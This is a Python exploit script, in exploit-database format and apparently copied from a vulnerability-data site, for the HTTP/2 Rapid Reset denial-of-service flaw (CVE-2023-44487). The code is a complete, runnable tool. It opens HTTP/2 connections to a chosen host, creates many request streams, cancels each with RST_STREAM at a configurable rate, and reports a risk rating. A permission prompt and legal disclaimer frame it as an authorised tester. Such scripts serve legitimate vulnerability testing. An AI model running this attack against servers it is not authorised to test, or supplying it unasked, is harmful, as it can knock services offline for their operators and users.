#!/usr/bin/env python3
"""
# Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS)
# Google Dork: -NA-
# Date: 29th August 2025
# Exploit Author: Madhusudhan Rajappa
# Vendor Homepage: -NA-
# Software Link: -NA-
# Version: HTTP/2.0
# Tested on: -NA-
# CVE : CVE-2023-44487
"""
import asyncio
import ssl
import time
import argparse
import logging
from typing import Optional, Tuple
import statistics
# The h2 package is the only third-party dependency. Fail early with an
# actionable message instead of a traceback when it is missing.
try:
    import h2.connection
    import h2.events
    import h2.exceptions
    import h2.config
except ImportError:
    # SystemExit with a string argument prints the message to stderr and exits
    # with status 1. Unlike the site-provided exit() helper it is always
    # available (for example under `python -S` or in frozen builds).
    raise SystemExit("Error: h2 library not installed. Install with: pip install h2")
# Configure logging: INFO-level records formatted as
# "<timestamp> - <level> - <message>".
_LOG_FORMAT = '%(asctime)s - %(levelname)s - %(message)s'
logging.basicConfig(format=_LOG_FORMAT, level=logging.INFO)

# Module-level logger shared by everything in this file.
logger = logging.getLogger(__name__)
class HTTP2RapidResetTester:
    """Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability.

    One instance wraps one TCP (optionally TLS) connection plus the h2 state
    machine that frames traffic for it. Typical use is ``connect()``, then
    ``baseline_test()`` and/or ``rapid_reset_test()``, then ``close()``.

    Attributes:
        host, port, use_ssl: Target endpoint, as passed to the constructor.
        connection: The h2 connection object, or None before ``connect()``.
        reader, writer: asyncio stream pair, or None when not connected.
        response_times: Durations (seconds) recorded by the tests.
        errors: Human-readable error strings collected during the tests.
        connection_closed: True once the peer or ``close()`` ended the link.
    """

    def __init__(self, host: str, port: int = 443, use_ssl: bool = True):
        self.host = host
        self.port = port
        self.use_ssl = use_ssl
        self.connection = None
        self.reader = None
        self.writer = None
        self.response_times = []
        self.errors = []
        self.connection_closed = False

    def _request_headers(self, user_agent: str) -> list:
        """Build the pseudo-headers for a ``GET /`` request to the target."""
        return [
            (':method', 'GET'),
            (':path', '/'),
            (':scheme', 'https' if self.use_ssl else 'http'),
            (':authority', self.host),
            ('user-agent', user_agent),
        ]

    async def connect(self) -> bool:
        """Establish HTTP/2 connection to the target server.

        Returns:
            True when the transport is open and the HTTP/2 preface was sent,
            False on any failure (the error is logged and the socket released).
        """
        try:
            logger.info(f"Connecting to {self.host}:{self.port}")
            if self.use_ssl:
                ssl_context = ssl.create_default_context()
                ssl_context.set_alpn_protocols(['h2'])
                self.reader, self.writer = await asyncio.open_connection(
                    self.host, self.port, ssl=ssl_context
                )
                # Offering h2 does not mean the server picked it. Speaking
                # HTTP/2 to an HTTP/1.1-only endpoint yields meaningless results.
                ssl_object = self.writer.get_extra_info('ssl_object')
                negotiated = ssl_object.selected_alpn_protocol() if ssl_object else None
                if negotiated != 'h2':
                    raise ConnectionError(
                        f"server did not negotiate HTTP/2 via ALPN (got {negotiated!r})"
                    )
            else:
                self.reader, self.writer = await asyncio.open_connection(self.host, self.port)

            # Initialize HTTP/2 connection
            config = h2.config.H2Configuration(client_side=True)
            self.connection = h2.connection.H2Connection(config=config)
            self.connection.initiate_connection()

            # _send_data() is a no-op while connection_closed is set, so the
            # flag must be cleared BEFORE the preface is sent. Otherwise a
            # reconnect on a previously closed instance sends nothing.
            self.connection_closed = False
            await self._send_data(self.connection.data_to_send())
            if self.connection_closed:
                raise ConnectionError("connection dropped while sending the HTTP/2 preface")

            logger.info("HTTP/2 connection established successfully")
            return True
        except Exception as e:
            logger.error(f"Failed to establish connection: {e}")
            # Do not leak a half-initialised socket.
            if self.writer is not None:
                self.writer.close()
            self.reader = None
            self.writer = None
            self.connection = None
            return False

    async def _send_data(self, data: bytes):
        """Send data to the server.

        Silently does nothing when there is no data, no writer, or the
        connection is already marked closed. Transport errors are logged at
        debug level and mark the connection closed rather than propagating.
        """
        if not data or not self.writer or self.connection_closed:
            return
        try:
            self.writer.write(data)
            await self.writer.drain()
        except (ConnectionResetError, BrokenPipeError, OSError) as e:
            logger.debug(f"Connection error while sending data: {e}")
            self.connection_closed = True

    async def _receive_data(self, timeout: float = 5.0) -> bytes:
        """Receive data from the server.

        Args:
            timeout: Maximum time in seconds to wait for bytes.

        Returns:
            The bytes read, or ``b''`` on timeout, on transport error, when
            not connected, or at EOF (EOF and errors also mark the connection
            closed).
        """
        try:
            if self.connection_closed or not self.reader:
                return b''
            data = await asyncio.wait_for(self.reader.read(65535), timeout=timeout)
            if not data:
                # An empty read means the peer closed its side.
                self.connection_closed = True
            return data
        except asyncio.TimeoutError:
            return b''
        except (ConnectionResetError, BrokenPipeError, OSError) as e:
            logger.debug(f"Connection error while receiving data: {e}")
            self.connection_closed = True
            return b''

    async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict:
        """
        Perform the rapid reset attack test.

        Opens up to ``num_streams`` request streams, then cancels each one
        with RST_STREAM, then listens for the server's reaction.

        Args:
            num_streams: Number of streams to create and reset
            delay: Delay between stream creations (seconds); resets are
                paced at one tenth of this value

        Returns:
            Dictionary with test results. On an unexpected failure the
            dictionary contains only an ``'error'`` key. Note that
            ``reset_rate`` is the rate at which this client wrote RST_STREAM
            frames; it is not a measurement of what the server processed.
        """
        logger.info(f"Starting rapid reset test with {num_streams} streams")
        if self.connection is None:
            logger.error("Error during rapid reset test: not connected")
            return {'error': 'not connected'}

        start_time = time.perf_counter()
        created_streams = []
        reset_streams = []
        headers = self._request_headers('CVE-2023-44487-Tester/1.0')
        try:
            # Phase 1: create streams
            for _ in range(num_streams):
                if self.connection_closed:
                    logger.warning("Connection closed during stream creation")
                    break
                # Ask h2 for the next legal client stream ID instead of
                # deriving it from the loop index, so IDs never collide with
                # streams opened earlier on this connection.
                stream_id = self.connection.get_next_available_stream_id()
                try:
                    # Send headers to create stream
                    self.connection.send_headers(stream_id, headers)
                    await self._send_data(self.connection.data_to_send())
                    created_streams.append(stream_id)
                    # Small delay to avoid overwhelming the connection
                    if delay > 0:
                        await asyncio.sleep(delay)
                except Exception as e:
                    self.errors.append(f"Error creating stream {stream_id}: {e}")
                    # Heuristic: stop on connection-level failures.
                    if "connection" in str(e).lower():
                        break
            logger.info(f"Created {len(created_streams)} streams")

            # Phase 2: reset all streams
            reset_start = time.perf_counter()
            for stream_id in created_streams:
                if self.connection_closed:
                    logger.warning("Connection closed during stream reset")
                    break
                try:
                    # Send RST_STREAM frame to cancel the request
                    self.connection.reset_stream(stream_id, error_code=0x8)  # CANCEL error code
                    await self._send_data(self.connection.data_to_send())
                    reset_streams.append(stream_id)
                    if delay > 0:
                        await asyncio.sleep(delay / 10)
                except h2.exceptions.StreamClosedError:
                    # Stream already closed, continue
                    pass
                except Exception as e:
                    self.errors.append(f"Error resetting stream {stream_id}: {e}")
                    if "connection" in str(e).lower():
                        break
            reset_duration = time.perf_counter() - reset_start
            # Measured before the monitoring phase so it covers only the
            # create/reset work.
            total_duration = time.perf_counter() - start_time
            logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s")

            # Phase 3: Monitor server response
            await self._monitor_server_response(timeout=10.0)

            return {
                'streams_created': len(created_streams),
                'streams_reset': len(reset_streams),
                'total_duration': total_duration,
                'reset_duration': reset_duration,
                'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0,
                'errors': len(self.errors),
                'response_times': self.response_times.copy(),
                'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
                'connection_closed': self.connection_closed
            }
        except Exception as e:
            logger.error(f"Error during rapid reset test: {e}")
            return {'error': str(e)}

    async def _monitor_server_response(self, timeout: float = 10.0):
        """Monitor server responses and measure response times.

        Reads from the socket until ``timeout`` seconds have elapsed or the
        connection closes. Each value appended to ``response_times`` is the
        time spent waiting for one chunk of bytes to arrive.
        """
        logger.info("Monitoring server responses...")
        deadline = time.monotonic() + timeout
        while not self.connection_closed:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                break
            try:
                wait_started = time.perf_counter()
                # Cap the read at the remaining budget so the loop cannot
                # overrun the requested timeout.
                data = await self._receive_data(timeout=min(5.0, remaining))
                waited = time.perf_counter() - wait_started
                if data:
                    self.response_times.append(waited)
                    try:
                        # Process HTTP/2 events
                        for event in self.connection.receive_data(data):
                            if isinstance(event, h2.events.ResponseReceived):
                                logger.debug(f"Response received on stream {event.stream_id}")
                            elif isinstance(event, h2.events.StreamReset):
                                logger.debug(f"Stream {event.stream_id} reset by server")
                            elif isinstance(event, h2.events.ConnectionTerminated):
                                logger.warning("Server terminated connection")
                                self.connection_closed = True
                                return
                        # Flush frames h2 queued in reaction to the input
                        # (for example SETTINGS or PING acknowledgements).
                        await self._send_data(self.connection.data_to_send())
                    except Exception as e:
                        logger.debug(f"Error processing HTTP/2 events: {e}")
                await asyncio.sleep(0.1)
            except Exception as e:
                self.errors.append(f"Error monitoring response: {e}")
                break

    async def _await_response(self, stream_id: int, timeout: float = 5.0) -> bool:
        """Wait until response headers arrive for ``stream_id``.

        Returns:
            True if a ResponseReceived event for the stream was seen before
            the timeout, False on timeout or when the connection closed.
        """
        deadline = time.monotonic() + timeout
        while not self.connection_closed:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                return False
            data = await self._receive_data(timeout=remaining)
            if not data:
                continue
            got_response = False
            for event in self.connection.receive_data(data):
                if isinstance(event, h2.events.ResponseReceived):
                    if event.stream_id == stream_id:
                        got_response = True
                elif isinstance(event, h2.events.DataReceived):
                    # Return flow-control credit so later responses are not
                    # stalled by an exhausted receive window.
                    self.connection.acknowledge_received_data(
                        event.flow_controlled_length, event.stream_id
                    )
                elif isinstance(event, h2.events.ConnectionTerminated):
                    logger.warning("Server terminated connection")
                    self.connection_closed = True
            await self._send_data(self.connection.data_to_send())
            if got_response:
                return True
        return False

    async def baseline_test(self, num_requests: int = 10) -> dict:
        """Perform baseline test with normal HTTP/2 requests.

        Sends ``num_requests`` sequential ``GET /`` requests. A request counts
        as successful only when response headers for that stream are received.

        Returns:
            Dictionary with ``total_requests``, ``successful_requests``,
            ``total_duration``, ``avg_response_time`` and ``success_rate``.
        """
        logger.info(f"Performing baseline test with {num_requests} normal requests")
        start_time = time.perf_counter()
        successful_requests = 0
        # Averaged separately so samples recorded by other tests on this
        # instance do not skew the baseline.
        latencies = []
        headers = self._request_headers('CVE-2023-44487-Baseline/1.0')
        for i in range(num_requests):
            if self.connection_closed:
                logger.warning("Connection closed during baseline test")
                break
            try:
                stream_id = self.connection.get_next_available_stream_id()
                request_start = time.perf_counter()
                self.connection.send_headers(stream_id, headers, end_stream=True)
                await self._send_data(self.connection.data_to_send())
                # Wait for response
                if await self._await_response(stream_id, timeout=5.0):
                    elapsed = time.perf_counter() - request_start
                    latencies.append(elapsed)
                    self.response_times.append(elapsed)
                    successful_requests += 1
                else:
                    logger.warning(f"Timeout waiting for response to request {i+1}")
                await asyncio.sleep(0.1)  # Small delay between requests
            except Exception as e:
                logger.warning(f"Error in baseline request {i+1}: {e}")
                if "connection" in str(e).lower():
                    break
        total_duration = time.perf_counter() - start_time
        return {
            'total_requests': num_requests,
            'successful_requests': successful_requests,
            'total_duration': total_duration,
            'avg_response_time': statistics.mean(latencies) if latencies else 0,
            'success_rate': successful_requests / num_requests if num_requests > 0 else 0
        }

    async def close(self):
        """Close the connection gracefully.

        Sends GOAWAY when the link is still believed to be up, then always
        closes the transport, including when the peer already closed the
        connection, so the socket is never leaked. Safe to call repeatedly.
        """
        writer = self.writer
        if writer is None:
            return
        try:
            if self.connection is not None and not self.connection_closed:
                try:
                    # Send GOAWAY frame if possible
                    self.connection.close_connection()
                    await self._send_data(self.connection.data_to_send())
                except Exception as e:
                    logger.debug(f"Error sending GOAWAY frame: {e}")
            # Close the writer
            writer.close()
            # Wait for close with timeout to avoid hanging
            try:
                await asyncio.wait_for(writer.wait_closed(), timeout=2.0)
            except asyncio.TimeoutError:
                logger.debug("Timeout waiting for connection to close")
            except (ConnectionResetError, BrokenPipeError, OSError):
                # Connection already closed by peer, this is expected
                pass
        except Exception as e:
            logger.debug(f"Error during connection cleanup: {e}")
        finally:
            self.connection_closed = True
            self.reader = None
            self.writer = None
def _print_baseline_report(baseline_results: dict) -> None:
    """Print the summary of a baseline_test() result dictionary."""
    print("Baseline Results:")
    print(f" Total Requests: {baseline_results['total_requests']}")
    print(f" Successful: {baseline_results['successful_requests']}")
    print(f" Success Rate: {baseline_results['success_rate']:.2%}")
    print(f" Avg Response Time: {baseline_results['avg_response_time']:.3f}s")
    print(f" Total Duration: {baseline_results['total_duration']:.3f}s")


def _print_rapid_reset_report(rapid_results: dict) -> None:
    """Print the summary of a successful rapid_reset_test() result."""
    print("Rapid Reset Results:")
    print(f" Streams Created: {rapid_results['streams_created']}")
    print(f" Streams Reset: {rapid_results['streams_reset']}")
    print(f" Reset Rate: {rapid_results['reset_rate']:.1f} resets/second")
    print(f" Total Duration: {rapid_results['total_duration']:.3f}s")
    print(f" Reset Duration: {rapid_results['reset_duration']:.3f}s")
    print(f" Errors: {rapid_results['errors']}")
    print(f" Avg Response Time: {rapid_results['avg_response_time']:.3f}s")
    if rapid_results.get('connection_closed'):
        print(" Connection Status: Server closed connection during test")


def _print_analysis(rapid_results: dict, error_count: int) -> None:
    """Print a heuristic interpretation of a successful rapid reset result.

    The rating is based on ``reset_rate``, which is the rate at which the
    client wrote RST_STREAM frames. Treat it as a rough indicator only.
    """
    print("\n" + "="*40)
    print("VULNERABILITY ANALYSIS")
    print("="*40)
    if rapid_results.get('connection_closed'):
        print("Server closed connection during rapid reset test")
        print(" This could indicate protective measures or resource exhaustion.")
    if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8:
        print("WARNING: Server may have rejected many reset requests")
        print(" This could indicate protective measures are in place.")
    if rapid_results['streams_reset'] == 0:
        # With nothing reset the rate is 0, which would otherwise be
        # reported as "rate limiting" even though nothing was exercised.
        print("INCONCLUSIVE: No streams were reset")
        print(" No risk rating can be derived from this run")
    elif rapid_results['reset_rate'] > 1000:
        print("HIGH RISK: Server accepts very high reset rates")
        print(" This may indicate vulnerability to CVE-2023-44487")
    elif rapid_results['reset_rate'] > 100:
        print("MEDIUM RISK: Server accepts moderate reset rates")
        print(" Further testing may be needed")
    else:
        print("LOWER RISK: Server has rate limiting on resets")
        print(" This suggests some protection against the vulnerability")
    if error_count > rapid_results['streams_created'] * 0.1:
        print("Many errors occurred during testing")
        print(" Results may not be reliable")


async def main():
    """Command-line entry point.

    Parses arguments, asks the operator to confirm authorization, runs the
    baseline test and, unless ``--baseline-only`` is given, the rapid reset
    test on a fresh connection, then prints the reports.
    """
    parser = argparse.ArgumentParser(
        description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester',
        epilog='WARNING: Only use on systems you own or have permission to test!'
    )
    parser.add_argument('host', help='Target hostname')
    parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS')
    parser.add_argument('-s', '--streams', type=int, default=100,
                        help='Number of streams for rapid reset test (default: 100)')
    parser.add_argument('-d', '--delay', type=float, default=0.001,
                        help='Delay between stream operations (default: 0.001s)')
    parser.add_argument('--baseline-only', action='store_true',
                        help='Only perform baseline test')
    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
    args = parser.parse_args()

    if args.verbose:
        logging.getLogger().setLevel(logging.DEBUG)

    print("=" * 60)
    print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}")
    print()

    # Legal disclaimer
    print("LEGAL DISCLAIMER:")
    print("This tool is for authorized security testing only.")
    print("Ensure you have permission to test the target system.")
    print("Unauthorized use may be illegal.")
    print()
    try:
        # Blocking call, but nothing else is scheduled on the loop yet.
        response = input("Do you have permission to test this system? (yes/no): ")
    except EOFError:
        # Non-interactive stdin: treat missing confirmation as a refusal.
        response = ''
    if response.strip().lower() != 'yes':
        print("Exiting. Only use this tool on systems you're authorized to test.")
        return

    tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
    try:
        # Connect to target
        if not await tester.connect():
            logger.error("Failed to establish connection. Exiting.")
            return

        # Perform baseline test
        print("\n" + "="*40)
        print("BASELINE TEST")
        print("="*40)
        baseline_results = await tester.baseline_test()
        _print_baseline_report(baseline_results)

        if not args.baseline_only:
            # Reset connection for rapid reset test
            await tester.close()
            tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
            if not await tester.connect():
                logger.error("Failed to re-establish connection for rapid reset test.")
                return

            # Perform rapid reset test
            print("\n" + "="*40)
            print("RAPID RESET TEST (CVE-2023-44487)")
            print("="*40)
            print(f"Testing with {args.streams} streams...")
            rapid_results = await tester.rapid_reset_test(args.streams, args.delay)
            if 'error' in rapid_results:
                # The error dictionary carries no metrics, so there is
                # nothing to analyse.
                print(f"Test failed: {rapid_results['error']}")
            else:
                _print_rapid_reset_report(rapid_results)
                _print_analysis(rapid_results, len(tester.errors))
    except KeyboardInterrupt:
        print("\nTest interrupted by user")
    except Exception as e:
        logger.error(f"Unexpected error: {e}")
    finally:
        try:
            await tester.close()
        except Exception as e:
            logger.debug(f"Error during final cleanup: {e}")
    print("\nTest completed.")
# Script entry point: print a short banner, then run the async main().
if __name__ == "__main__":
    print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
    print("Requires: pip install h2")
    print()
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        print("\nExiting...")
    except Exception as e:
        logger.error(f"Fatal error: {e}")
        # Signal the failure to the calling shell instead of exiting with 0.
        raise SystemExit(1)
# NOTE: a stray word ("Data") from the hosting web page was fused onto the
# last statement above and has been removed; it was not part of the program.
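# ---------------------------------------------------------------------------
# The lines below are text from the web page this script was copied from.
# They are not part of the program and are kept only as comments.
# ---------------------------------------------------------------------------
# Data
# Build on a solid foundation with Vulners data.
# We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploit data.
# API
# Power your application with the Vulners API.
# The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with a 99.9% uptime SLA and CDN-backed data delivery for seamless global access.
# App
# Assess and manage vulnerabilities with Vulners tools.
# Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation.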